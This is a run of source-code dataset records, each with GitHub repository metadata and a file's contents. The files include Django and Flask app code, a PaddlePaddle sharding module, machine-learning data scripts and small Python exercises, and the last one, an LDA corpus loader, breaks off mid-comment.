] | carlos.durante@outlook.com |
6ff66a5e7100cbdd1877f359622be88b41e19b2c | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/keras_applications/inception_v3.py | 1b825c0ce4aea562e468b337a5843f63810f57d5 | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:6bdeecc0c5e0341451f5d87e17d12c89a210b6161e1b066aca6e02bc425b2abf
size 14598
| [
"github@cuba12345"
] | github@cuba12345 |
a2db034c1d50da2e34891134fde2e681c236bfe9 | 8c97bb5c1086ba74530d22f9c50819397978a974 | /users/models.py | c3b92318a1becc6ff1ca1bf09ce162088cb82cfb | [] | no_license | AKTANBEK/github_lecture | 57b9f3ba608ff74d6f8869a3a65ad40048a381c4 | 4a451d7637ed30e25e5d0f30b6ecfbabe18f57ff | refs/heads/master | 2023-05-01T23:50:44.522990 | 2021-05-28T11:53:50 | 2021-05-28T11:53:50 | 363,147,068 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | from django.db import models
from django.contrib.auth.models import User
class Profile(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE)
def __str__(self):
return self.user.username
| [
"uaqwe1147@gmail.com"
] | uaqwe1147@gmail.com |
2e4a78b6ce6826ea057191500296c3f66e2baed0 | d55b7c1896cfa69f9972a111c5cc33e5721587a2 | /Trees/convertSortedArrayToBST.py | db6c176d2ae558121c9bbe05da6c9dd2be3aa542 | [] | no_license | SumaDodo/Programming-concepts | 6777f530d70cc8167ffa599e675bfd059260c0d0 | bdb453dbcec5da65f5c99b0b91c1e230faa68178 | refs/heads/master | 2020-03-26T22:26:28.081618 | 2019-10-26T07:11:54 | 2019-10-26T07:11:54 | 145,458,878 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 678 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def sortedArrayToBST(self, nums):
"""
:type nums: List[int]
:rtype: TreeNode
"""
length = len(nums)
if length == 0:
return None
if length == 1:
return TreeNode(nums[0])
root = TreeNode(nums[length/2])
root.left = self.sortedArrayToBST(nums[:(length/2)])
root.right = self.sortedArrayToBST(nums[(length/2)+1:])
return root
| [
"noreply@github.com"
] | noreply@github.com |
568aa59ae896f8dcad1d6c4c19a117a22a0ff63c | c4d05bf624ce277b35d83ba8ba9636f26043280e | /project/urls.py | d6e90307036ceed43e1f6355ce2dc672ebb0e233 | [
"Apache-2.0"
] | permissive | DrMartiner/kaptilo_back | 2366b3a2b5c9bd9dc57c9091ff5fd0025963668d | df7f716030edbb1a70388fcbb808b0985dabefbf | refs/heads/main | 2023-04-09T03:12:52.274388 | 2021-03-22T09:48:39 | 2021-03-22T09:48:39 | 349,943,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 862 | py | from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.urls import path, include
from apps.link.views import OriginalLinkRedirectView
admin.site.site_header = "Kaptilo"
admin.site.site_title = "Kaptilo"
admin.site.index_title = "Welcome to Kaptilo admin-panel"
urlpatterns = [
path("<str:uuid>/", OriginalLinkRedirectView.as_view(), name="original-link-redirect"),
path("api/v1/", include(("apps.api.urls", "apps.api"), namespace="api_v1")),
path("admin/super-sec/", admin.site.urls),
path("admin/", include("admin_honeypot.urls", namespace="admin_honeypot")),
]
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"DrMartiner@GMail.Com"
] | DrMartiner@GMail.Com |
61089b5be8aca25aef1be234390e37e45c3041ed | 0107625e299239a0b4231445b4c2618b9af1922e | /lib/kernel/test/kernel_bench.spec | 8de60dae31702c317c6e39c02d9ca728d6fdac99 | [
"Apache-2.0"
] | permissive | couchbasedeps/erlang | 2e06918303e2aa065d77624efb4d17a3116a854a | abd486acf586207ee2c3e8dd3589e817527887c0 | refs/heads/couchbase-madhatter | 2023-07-09T08:02:53.966922 | 2022-12-19T23:38:56 | 2022-12-19T23:38:56 | 30,359,045 | 2 | 8 | Apache-2.0 | 2023-03-29T16:19:50 | 2015-02-05T14:20:04 | Erlang | UTF-8 | Python | false | false | 46 | spec | {groups,"../kernel_test",zlib_SUITE,[bench]}.
| [
"john@erlang.org"
] | john@erlang.org |
8d6b7100e1ca9bc1aa8edd46c91935f9aebbd87e | 3a1be455fc5e117bd8792ed46c59793f8b29a01f | /python/paddle/distributed/sharding/group_sharded.py | 6fd4caa7b4a5c41e73fcf95ac50d0253bb3e7c79 | [
"Apache-2.0"
] | permissive | liyancas/Paddle | 42d5e7c71c37b4e63bf54e6e31e82e40aef044ce | 98303291d27cb831b19111d82793159cbe9a85ca | refs/heads/develop | 2022-05-21T03:27:16.497238 | 2022-04-01T00:52:17 | 2022-04-01T00:52:17 | 72,499,865 | 0 | 0 | Apache-2.0 | 2022-02-11T08:16:37 | 2016-11-01T03:17:41 | Python | UTF-8 | Python | false | false | 9,839 | py | # Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
from enum import Enum
import paddle
from paddle.optimizer import Optimizer
from paddle.distributed.utils import get_logger
from paddle.distributed.fleet.meta_optimizers.dygraph_optimizer.sharding_optimizer_stage2 import ShardingOptimizerStage2
from paddle.distributed.fleet.meta_parallel.sharding.sharding_stage2 import ShardingStage2
from paddle.distributed.fleet.meta_parallel.sharding.sharding_stage3 import ShardingStage3
from paddle.distributed.fleet.meta_parallel.sharding.sharding_utils import ShardingScaler
logger_ = get_logger(logging.INFO)
def group_sharded_parallel(model,
optimizer,
level,
scaler=None,
group=None,
offload=False,
sync_buffers=False,
buffer_max_size=2**23,
segment_size=2**20,
sync_comm=False):
"""
Use group_sharded_parallel can perform group shared configuration on the model, optimizer and GradScaler. Level has three string options, 'os', 'os_g' and 'p_g_os' corresponds to three different usage scenarios: optimizer state segmentation, optimizer state + gradient segmentation, and parameter + gradient + optimizer state segmentation.
Usually, optimizer state + gradient segmentation is actually a re optimization of optimizer state segmentation, so optimizer state + gradient segmentation can be used to realize optimizer state segmentation.
Args:
model (Layer): The layer to be wrapped with group_sharded_parallel.
optimizer (Optimizer): The optimizer to be wrapped with group_sharded_parallel.
level (str): The different level of the group sharded. Such as `os`, `os_g`, `p_g_os`.
scaler (GradScaler, optional): If AMP is used, you need to pass GradScaler. Defaults to None, indicating that GradScaler is not used.
group (Group, optional): The group instance. Defaults to None, indicating that the default environment group is used.
offload (bool, optional): Whether to use the offload function. Defaults to False, which means that the offload function is not used.
sync_buffers (bool, optional): Whether to broadcast model buffers. It is generally used when there are registered model buffers. Defaults to False, indicating that model buffers are not used.
buffer_max_size (int, optional): The max size of the buffer used to integrate gradient in `os_g`. The larger the size, the more GPU memory will be used. Defaults to 2**23, which means that the dimension of the buffer is 2**23.
segment_size (int, optional): The smallest size of parameter to be sharded in `p_g_os`. Defaults to 2**20, indicating that the dimension of the minimum segmented parameter is 2**20.
sync_comm (bool, optional): Whether to use synchronous communication, only in `p_g_os` used. Defaults to False, indicating that asynchronous communication is used.
Returns:
model: A wrapper for group sharded given model.
optimizer: A wrapper for group sharded given optimizer.
scaler: A wrapper for group sharded given scaler.
Examples:
.. code-block:: python
# required: distributed
import paddle
from paddle.fluid.dygraph.nn import Linear
from paddle.distributed import fleet
from paddle.distributed.sharding import group_sharded_parallel
fleet.init(is_collective=True)
group = paddle.distributed.new_group([0, 1])
model = Linear(1000, 1000)
clip = paddle.nn.ClipGradByGlobalNorm(clip_norm=1.0)
optimizer = paddle.optimizer.AdamW(learning_rate=0.001, parameters=model.parameters(), weight_decay=0.00001, grad_clip=clip)
# wrap sharding model, optimizer and scaler
model, optimizer, scaler = group_sharded_parallel(model, optimizer, "p_g", scaler=scaler)
img, label = data
label.stop_gradient = True
img.stop_gradient = True
out = model(img)
loss = paddle.nn.functional.cross_entropy(input=out, label=label)
loss.backward()
optimizer.step()
optimizer.clear_grad()
"""
# check optition type
assert isinstance(
model,
paddle.nn.Layer), "The model must be the instance of paddle.nn.Layer."
assert isinstance(
optimizer, Optimizer
), "The optimizer must be the instance of paddle.optimizer.Optimizer."
assert level in ['os', 'os_g', 'p_g_os'
], "The level must be os, os_g or p_g_os."
def check_dtype(param):
return param.dtype == paddle.float16
params_fp16 = list(filter(check_dtype, model.parameters()))
if scaler is None and len(params_fp16) > 0:
raise ValueError("Please enter the correct scaler.")
# convert model/optimizer/scaler
if level in ['os', 'os_g']:
logger_.info("*" * 30)
logger_.info("Sharded level os uses sharded level os_g achieved now.")
logger_.info("*" * 30)
optimizer = ShardingOptimizerStage2(
params=model.parameters(),
optim=optimizer,
group=group,
offload=offload)
model = ShardingStage2(
model,
optimizer,
group=group,
sync_buffers=sync_buffers,
buffer_max_size=buffer_max_size)
elif level == 'p_g_os':
model = ShardingStage3(
model,
optimizer=optimizer,
group=group,
sync_buffers=sync_buffers,
segment_size=segment_size,
offload=offload,
sync_comm=sync_comm)
else:
raise ValueError("Please enter the correct level.")
if params_fp16 and isinstance(scaler, paddle.amp.GradScaler):
scaler = ShardingScaler(scaler)
logger_.info("*" * 30)
logger_.info(
"If there is a communication hang using group sharded, please check whether the communication operations of each process are unified."
)
logger_.info("*" * 30)
return model, optimizer, scaler
def save_group_sharded_model(model, output, optimizer=None):
"""
Group sharded encapsulated model and optimizer state saving module.
.. note::
If using save_group_sharded_model saves the model. When loading again, you need to set the model or optimizer state before using group_sharded_parallel.
Args:
model (Layer): A wrapper for group sharded given model.
output (str): Save directory.
optimizer (Optimizer, optional): Group sharded encapsulated optimizer. Defaults to None, indicating that the optimizer state is not saved.
Examples:
.. code-block:: python
# required: distributed
import paddle
from paddle.fluid.dygraph.nn import Linear
from paddle.distributed import fleet
from paddle.distributed.sharding import group_sharded_parallel, save_group_sharded_model
fleet.init(is_collective=True)
group = paddle.distributed.new_group([0, 1])
model = Linear(1000, 1000)
clip = paddle.nn.ClipGradByGlobalNorm(clip_norm=1.0)
optimizer = paddle.optimizer.AdamW(learning_rate=0.001, parameters=model.parameters(), weight_decay=0.00001, grad_clip=clip)
# wrap sharding model, optimizer and scaler
model, optimizer, scaler = group_sharded_parallel(model, optimizer, "p_g", scaler=scaler)
img, label = data
label.stop_gradient = True
img.stop_gradient = True
out = model(img)
loss = paddle.nn.functional.cross_entropy(input=out, label=label)
loss.backward()
optimizer.step()
optimizer.clear_grad()
# save model and optimizer state_dict
save_group_sharded_model(model, optimizer, output=output_dir)
"""
logger_.info(
"==========Begin to save group sharded model and optimizer==========")
assert not os.path.isfile(
output
), "Saving directory ({}) should be a directory, not a file".format(output)
os.makedirs(output, exist_ok=True)
output_model = os.path.join(output, "model.pdmodel")
if isinstance(model, ShardingStage2):
paddle.save(model._layer.state_dict(), output_model)
elif isinstance(model, ShardingStage3):
convert2cpu = True if model._offload else False
model.get_all_parameters(convert2cpu=convert2cpu)
paddle.save(model._layer.state_dict(), output_model)
else:
raise ValueError(
"Please use the layer which is wrapped with group_sharded_parallel.")
if optimizer is not None:
assert hasattr(
optimizer, "_optim"
), "Please use the optimizer which is wrapped with group_sharded_parallel."
output_opt = os.path.join(output, "model.pdopt")
paddle.save(optimizer._optim.state_dict(), output_opt)
logger_.info(
"==========End to save group sharded model and optimizer==========")
| [
"noreply@github.com"
] | noreply@github.com |
cb40eb72702412c39e279e92f220c505c9ded27a | 47d380ce6ab4c1110921702e996e34a91b50e7e3 | /code/createAdjacencyMatrix.py | 6c335e6970d3933a6e6f0e33a74af6618e9faeca | [] | no_license | stamakro/revival-ppi | 7af4299cef3103f66c7dea79bb50ca7b5fee4e9c | b7102abba7584fe0583abc6c1315adf52cb7c450 | refs/heads/master | 2022-12-18T09:51:02.338318 | 2020-09-17T12:26:09 | 2020-09-17T12:26:09 | 239,557,112 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,423 | py | import numpy as np
import pickle
from scipy.sparse import csr_matrix, save_npz
import sys
species = sys.argv[1]
try:
prefix = sys.argv[2]
except IndexError:
prefix = 'P_'
try:
excludeUnannotated = bool(int(sys.argv[3]))
except IndexError:
excludeUnannotated = True
path = '../data/' + species + '/interactions/'
if excludeUnannotated:
inFileName = path + 'ppi-clean'
else:
inFileName = path + 'ppi-clean+unannotated'
proteins = set()
with open(inFileName) as f:
for line in f:
for protein in line.split():
proteins.add(protein)
with open('../data/' + species + '/annotations/' + prefix + 'geneNames.pkl', 'rb') as f:
geneNamesY = pickle.load(f)
protein2row = dict()
for i, g in enumerate(geneNamesY):
protein2row[g] = i
if not excludeUnannotated:
for p in proteins:
if p not in protein2row:
i += 1
protein2row[p] = i
with open('../data/' + species + '/interactions/unannotatedProteinOrderBiogrid.pkl', 'wb') as f:
pickle.dump(protein2row, f)
A = np.zeros((len(protein2row), len(protein2row)), int)
with open(inFileName) as f:
for line in f:
[p1, p2] = line.split()
i = protein2row[p1]
j = protein2row[p2]
A[i, j] = 1
A[j, i] = 1
outFile = path + ''
if excludeUnannotated:
save_npz(path + 'final/biogrid/A.npz', csr_matrix(A))
else:
save_npz(path + 'final/biogrid/A+unannotated.npz', csr_matrix(A))
| [
"stavrosmakrodi@login3.hpc.tudelft.nl"
] | stavrosmakrodi@login3.hpc.tudelft.nl |
8065d754386fc0b3762e05f4fc04a7f53121086e | 9da6c375dbf1af87622a2ba0fb773e8f513d8021 | /cli/bak.20200512-local/abcombo.py | a267f8c6d9d445c64cdd848a3d93c27eb4e147ce | [] | no_license | wri/tree_canopy_fcn | a80a9971403f6ca2548d44146ed08aa22d7d559e | 78f742e4e26e34008417468f73413643edde801e | refs/heads/master | 2022-10-11T03:25:41.503263 | 2020-06-16T12:39:21 | 2020-06-16T12:39:21 | 236,492,565 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,895 | py | import os,sys
PROJECT_DIR='/home/ericp/tree_canopy_fcn/repo'
sys.path.append(PROJECT_DIR)
from pprint import pprint
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
from torch_kit.loss import MaskedLoss
import torch_kit.functional as F
from torch_kit.optimizers.radam import RAdam
import pytorch_models.deeplab.model as dm
import pytorch_models.unet.model as um
from utils.dataloader import HeightIndexDataset, CATEGORY_BOUNDS
from config import BUILTUP_CATEGORY_THRESHOLDS
#
# RUN CONFIG
#
BATCH_SIZE=8
DEFAULT_OPTIMIZER='adam'
LRS=[1e-3,1e-4]
NB_CATEGORIES=len(CATEGORY_BOUNDS)+1
# # AB STATS: ALL
# MEANS=[100.83741572079242, 100.4938850966076, 86.63500986931308, 118.72746674454453]
# STDEVS=[42.098045003124774, 39.07388735786421, 39.629813116928815, 34.72351480486876]
# DSETS_PATH='../datasets/los_angeles-plieades-lidar_USGS_LPC_CA_LosAngeles_2016_LAS_2018.STATS.csv'
# AB STATS: 2015,16 Train/valid
MEANS=[94.79936157686979, 92.8912348691044, 80.50194782393349, 108.14889758142212]
STDEVS=[36.37876660224377, 33.22686387734999, 33.30808192430284, 30.075380846943716]
DSETS_PATH='../datasets/los_angeles-plieades_naip-lidar_USGS_LPC_CA_LosAngeles_2016_LAS_2018.STATS.csv'
YEAR_MAX=2016
# # NAIP STATS: ALL (<2017)
# MEANS=[106.47083152919251, 104.25520495313522, 98.61836143687523, 119.95594400425841]
# STDEVS=[38.23711386806666, 34.410688920150264, 31.468324931640534, 31.831786730471276]
# DSET_PATH=f'{PROJECT_DIR}/datasets/los_angeles-naip-lidar_USGS_LPC_CA_LosAngeles_2016_LAS_2018.STATS.csv'
# # NAIP ONLY
# IBNDS={
# '4': { 'min': 0 }, # ndvi
# '5': { 'min': -0.35} # ndwi
# }
# # PLIEDES INPUT
IBNDS=None
#
# TORCH_KIT CLI
#
def model(**cfig):
_header('model',cfig)
model_type=cfig.pop('type','dlv3p')
cfig['out_ch']=cfig.get('out_ch',NB_CATEGORIES)
if model_type=='dlv3p':
mod=dm.DeeplabV3plus(**cfig)
elif model_type=='unet':
mod=um.UNet(**cfig)
else:
raise ValueError(f'model_type ({model_type}) not implemented')
if torch.cuda.is_available():
mod=mod.cuda()
return mod
def criterion(**cfig):
ignore_index=cfig.get('ignore_index')
weights=cfig.get('weights')
print("criterion:",ignore_index,weights)
if weights:
weights=torch.Tensor(weights)
if torch.cuda.is_available():
weights=weights.cuda()
if ignore_index is not None:
criterion=nn.CrossEntropyLoss(weight=weights,ignore_index=ignore_index)
# criterion=MaskedLoss(
# weight=weights,
# loss_type='ce',
# mask_value=ignore_index )
else:
criterion=nn.CrossEntropyLoss(weight=weights)
return criterion
def optimizer(**cfig):
_header('optimizer',cfig)
opt_name=cfig.get('name',DEFAULT_OPTIMIZER)
if opt_name=='adam':
optimizer=torch.optim.Adam
elif opt_name=='radam':
optimizer=RAdam
else:
ValueError(f'optimizer "{opt_name}" not implemented')
return optimizer
def loaders(**cfig):
"""
"""
# INITAL DATASET HANDLING
dsets_df=pd.read_csv(DSETS_PATH)
train_df=dsets_df[dsets_df.dset_type=='train']
valid_df=dsets_df[dsets_df.dset_type=='valid']
train_df=train_df[train_df.input_year<=YEAR_MAX].iloc[1:6*8+1]
valid_df=valid_df[valid_df.input_year<=YEAR_MAX]
example_path=train_df.rgbn_path.iloc[0]
#
# on with the show
#
dev=cfig.get('dev')
vmap=cfig.get('vmap')
batch_size=cfig.get('batch_size',BATCH_SIZE)
band_indices=['ndvi']
augment=cfig.get('augment',True)
shuffle=cfig.get('shuffle',True)
no_data_value=cfig.get('no_data_value',False)
cropping=cfig.get('cropping',None)
float_cropping=cfig.get('float_cropping',None)
update_version=cfig.get('update_version',False)
print('AUGMENT:',augment)
print('SHUFFLE:',shuffle)
print('BATCH_SIZE:',batch_size)
print('NO DATA VALUE:',no_data_value)
print('CROPPING:',cropping)
print('FLOAT CROPPING:',float_cropping)
if (train_df.shape[0]>=batch_size*8) and (valid_df.shape[0]>=batch_size*2):
if dev:
train_df=train_df.sample(batch_size*8)
valid_df=valid_df.sample(batch_size*2)
dl_train=HeightIndexDataset.loader(
batch_size=batch_size,
# input_bands=[0,1,2],
# input_band_count=3,
band_indices=['ndvi'],
category_bounds=HeightIndexDataset.NAIP_GREEN,
input_bounds=IBNDS,
dataframe=train_df,
means=MEANS,
stdevs=STDEVS,
no_data_value=no_data_value,
cropping=cropping,
float_cropping=float_cropping,
example_path=example_path,
augment=augment,
train_mode=True,
target_dtype=np.int,
shuffle_data=shuffle)
return dl_train, None
dl_valid=HeightIndexDataset.loader(
batch_size=batch_size,
# input_bands=[0,1,2],
# input_band_count=3,
band_indices=['ndvi'],
category_bounds=HeightIndexDataset.NAIP_GREEN,
input_bounds=IBNDS,
dataframe=valid_df,
means=MEANS,
stdevs=STDEVS,
no_data_value=no_data_value,
cropping=cropping,
float_cropping=float_cropping,
example_path=example_path,
augment=augment,
train_mode=True,
target_dtype=np.int,
shuffle_data=shuffle)
print("SIZE:",train_df.shape[0],valid_df.shape[0])
return dl_train, dl_valid
else:
print('NOT ENOUGH DATA',train_df.shape[0],valid_df.shape[0],batch_size*8,batch_size*30)
return False, False
#
# HELPERS
#
def _header(title,cfig=None):
print('='*100)
print(title)
print('-'*100)
if cfig:
pprint(cfig)
| [
"bguzder-williams@wri.org"
] | bguzder-williams@wri.org |
b82aecdb000493caac1d2ceb3d8395e7b3d8dfee | 665f790f21cd557b0fea2bc95485279c170bf022 | /1029.py | c8b0b6848ee17587c213521a23484c69ab27ed97 | [] | no_license | GustavoFelici/URI | 6340216052391bb1e907390d25cfa45a77cd7123 | 3d725c59a875e38a2efc392b8ac6a90e8cbc15e9 | refs/heads/master | 2022-11-18T07:34:54.409603 | 2020-07-21T17:16:08 | 2020-07-21T17:16:08 | 279,670,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 330 | py | def fibonacci(n):
global cont
cont += 1
if n <= 1:
return n
else:
return fibonacci(n - 1) + fibonacci(n - 2)
n = int(input())
for i in range(n):
x = int(input())
cont = 0
resu = fibonacci(x)
print('fib({}) = {} calls = {}'.format(x, cont-1, resu))
#Time limited | [
"noreply@github.com"
] | noreply@github.com |
53dde5e6a5ba9a3e8b6c98645afbdb2cc20b2cc3 | c98bfa980a5a9ada52702aca21538bdca9141815 | /course_14/modularization.py | f7e8b09e97a145c96c0a4d805d2271d617320e4f | [] | no_license | Borye/CSVT_Python | e8c1020f0127c6cc93a6e18a542ee2970eb394f7 | ffd7db7686c679e707a4e406fd330863fa3cb338 | refs/heads/master | 2020-05-30T02:37:41.162318 | 2015-02-06T08:47:14 | 2015-02-06T08:47:14 | 30,402,666 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 897 | py | #coding:utf8
'''
模块是python组织代码的基本方式
python的脚本都是.py文件
一个脚本可以单独运行,也可以导入另一个脚本运行
当脚本被导入运行时,我们称其为模块
模块名就是脚本的文件名
item.py ------- import item
包
创建一个包的步骤:
1 建立一个名字为包名字的文件夹
2 在该文件夹创建一个__init__.py文件
3 根据需要在该文件夹下存放脚本文件,已编扩展及子包
import pack.m1, pack.m2, pack.m3
起文件名的时候不要跟以有模块重复
导模块会先从当前目录导,如果当前没有,就去c://python27/lib 里面找
.py 脚本文件
.pyc 编译之后的文件
.pyo 优化之后的文件
'''
import mymod
'''
mymod.jia(1, 2)
'''
import c1
t = c1.MyClass()
t.myMethod()
from c1 import MyClass # 从模块c1里面导入类MyClass
t = MyClass()
t.myMethod() | [
"boli.89123@gmail.com"
] | boli.89123@gmail.com |
668963624d3086f1b1dd35cf080200af75bf8736 | 191a7f83d964f74a2b3c7faeb4fc47d9c63d521f | /.history/main_20210523152045.py | 6d7861a88a7d86a28f1d8d675b4416ba674fb3c2 | [] | no_license | AndreLiu1225/Kinder-Values-Survey | 2a317feee8d5b17c27da2b2116742656e35d8ab9 | 090c27da0c822abb7dfc0ec6e13ae1b3dcb7bbf3 | refs/heads/master | 2023-05-03T00:26:00.481423 | 2021-06-04T03:24:19 | 2021-06-04T03:24:19 | 371,989,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,795 | py | from flask import Flask, render_template, redirect, url_for
from flask_wtf import FlaskForm
from wtforms import StringField, TextField, SubmitField, IntegerField, SelectField, RadioField
from wtforms.validators import DataRequired, Email, EqualTo, Length, ValidationError
app = Flask(__name__)
app.config['SECRET_KEY'] = "0c8973c8a5e001bb0c816a7b56c84f3a"
class MCQ(FlaskForm):
age = IntegerField("Please enter your age", validators=[DataRequired()])
profession = StringField("What is your profession?", validators=[DataRequired(), Length(max=30)])
power = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
tradition = RadioField("Do you care preservingabout tradition", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
achievement = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
stimulation = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
hedonism = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
conformity = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
self_direction = RadioField("Do you desire a higher social status and dominance over others?", choices=[('Yes', 'It is my priority'), ('No', 'It is not my priority')])
submit = SubmitField("Submit")
if __name__ == "__main__":
app.run(debug=True)
| [
"andreliu2004@gmail.com"
] | andreliu2004@gmail.com |
885525dbf6209648cb4d8a7b6a68e3877d3f3342 | 58c0869520ceeb261f722976b37d2b11a4be01b0 | /source/arcade_nuke/utility.py | a17240b1e9c19d233275dce6cbe45a6fcb9f4905 | [] | no_license | buddly27/arcade-nuke | 640622af4c5b329bc43b0a4b44e6999c103aaff5 | 5478ce1b9b9932d349f45b17c87b7f2eb35ed554 | refs/heads/master | 2022-10-05T09:27:46.507448 | 2020-05-28T04:16:05 | 2020-05-28T04:16:05 | 262,652,347 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,846 | py | # :coding: utf-8
import arcade_nuke.node
def draw_game_over(x, y):
"""Draw 'Game Over.' using dots.
:param x: Position of the left corner of the pattern.
:param y: Position of the top corner of the pattern.
"""
words = [
[
[
(1, 0), (2, 0), (3, 0), (4, 0), (0, 1), (0, 2), (3, 2), (4, 2),
(0, 3), (4, 3), (1, 4), (2, 4), (3, 4), (4, 4)
],
[
(2, 0), (1, 1), (3, 1), (0, 2), (4, 2), (0, 3), (1, 3), (2, 3),
(3, 3), (4, 3), (0, 4), (4, 4)
],
[
(0, 0), (4, 0), (0, 1), (1, 1), (3, 1), (4, 1), (0, 2), (2, 2),
(4, 2), (0, 3), (4, 3), (0, 4), (4, 4)
],
[
(0, 0), (1, 0), (2, 0), (3, 0), (4, 0), (0, 1), (0, 2), (1, 2),
(2, 2), (0, 3), (0, 4), (1, 4), (2, 4), (3, 4), (4, 4)
]
],
[
[
(1, 0), (2, 0), (3, 0), (0, 1), (4, 1), (0, 2), (4, 2), (0, 3),
(4, 3), (1, 4), (2, 4), (3, 4)
],
[
(0, 0), (4, 0), (0, 1), (4, 1), (0, 2), (4, 2), (1, 3), (3, 3),
(2, 4)
],
[
(0, 0), (1, 0), (2, 0), (3, 0), (4, 0), (0, 1), (0, 2), (1, 2),
(2, 2), (0, 3), (0, 4), (1, 4), (2, 4), (3, 4), (4, 4)
],
[
(0, 0), (1, 0), (2, 0), (3, 0), (0, 1), (4, 1), (0, 2), (1, 2),
(2, 2), (3, 2), (0, 3), (4, 3), (0, 4), (4, 4)
]
],
[
[
(0, 4)
]
]
]
points = []
_x = x
for word in words:
for letter in word:
for index_x, index_y in letter:
point = arcade_nuke.node.DotNode(
x=_x + arcade_nuke.node.DotNode.width() * index_x,
y=y + arcade_nuke.node.DotNode.height() * index_y,
)
point.create_node()
points.append(point)
_x += 11 * 6
_x += 11 * 2
return points
def draw_win(x, y):
"""Draw 'You win!' using dots.
:param x: Position of the left corner of the pattern.
:param y: Position of the top corner of the pattern.
"""
words = [
[
[
(0, 0), (4, 0), (1, 1), (3, 1), (2, 2), (2, 3), (2, 4)
],
[
(1, 0), (2, 0), (3, 0), (0, 1), (4, 1), (0, 2), (4, 2), (0, 3),
(4, 3), (1, 4), (2, 4), (3, 4)
],
[
(0, 0), (4, 0), (0, 1), (4, 1), (0, 2), (4, 2), (0, 3), (4, 3),
(1, 4), (2, 4), (3, 4)
]
],
[
[
(0, 0), (4, 0), (0, 1), (4, 1), (0, 2), (2, 2), (4, 2), (0, 3),
(1, 3), (3, 3), (4, 3), (0, 4), (4, 4)
],
[
(1, 0), (2, 0), (3, 0), (0, 1), (4, 1), (0, 2), (4, 2), (0, 3),
(4, 3), (1, 4), (2, 4), (3, 4)
],
[
(0, 0), (4, 0), (0, 1), (1, 1), (4, 1), (0, 2), (2, 2), (4, 2),
(0, 3), (3, 3), (4, 3), (0, 4), (4, 4)
]
],
[
[
(0, 0), (0, 1), (0, 2), (0, 4)
]
]
]
points = []
_x = x
for word in words:
for letter in word:
for index_x, index_y in letter:
point = arcade_nuke.node.DotNode(
x=_x + arcade_nuke.node.DotNode.width() * index_x,
y=y + arcade_nuke.node.DotNode.height() * index_y,
)
point.create_node()
points.append(point)
_x += 11 * 6
_x += 11 * 2
return points
| [
"jeremy.retailleau@gmail.com"
] | jeremy.retailleau@gmail.com |
2a6384ac94d1bb426a45a2625e3cd634028475aa | 7664a19fee5eb35f53495a8b4907a8e792606d5b | /LdaFea.py | 69cde28d31c6dc5ed1de890f38fd3408b8291ec4 | [] | no_license | starovo123/ELMoCNN | a2b5ba20318c548f55fe5f936d62d20d87f82b34 | 716d0c55455c7e8bb66343ab83240d43e189c63c | refs/heads/master | 2023-03-10T21:50:12.275197 | 2021-02-24T04:25:26 | 2021-02-24T04:25:26 | 341,778,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,104 | py | import os
import numpy as np
from gensim import corpora, models, similarities
import time
import scipy.io as scio
# import logging
# logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
def load_stopword():
'''
加载停用词表
:return: 返回停用词的列表
'''
f_stop = open('E:/Data/stopwords/en_stopwords.txt', encoding='utf-8')
sw = [line.strip() for line in f_stop]
f_stop.close()
return sw
def create_corpusList():
texts = [] # list of text samples
labels_index = {} # dictionary mapping label name to numeric id
labels = [] # list of label ids
TEXT_DATA_DIR = 'E:/Data/20_Newsgroups/20newsgroup'
for name in sorted(os.listdir(TEXT_DATA_DIR)):
path = os.path.join(TEXT_DATA_DIR, name)
if os.path.isdir(path):
label_id = len(labels_index)
labels_index[name] = label_id
if label_id == 2:
break
for fname in sorted(os.listdir(path)):
if fname.isdigit():
fpath = os.path.join(path, fname)
f = open(fpath, 'r', encoding='latin-1')
texts.append(f.read().strip())
f.close()
labels.append(label_id)
return texts
# f = open('E:/Code/ELMo_CNN/LdaCorpus.txt', 'w', encoding='utf-8')
# for t in texts:
